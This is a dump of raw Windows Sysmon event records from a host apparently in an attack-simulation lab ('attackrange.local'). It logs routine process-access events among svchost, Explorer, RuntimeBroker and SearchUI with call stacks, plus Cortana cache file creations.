13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000011376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-01-14 13:30:11.295 11241100x800000000000000011375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-01-14 13:30:11.295 11241100x800000000000000011374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-01-14 13:30:11.295 11241100x800000000000000011373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-01-14 13:30:11.295 10341000x800000000000000011372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+c029|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.277{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+bfb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+c029|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+bfb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+b81e|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000011365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.264{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 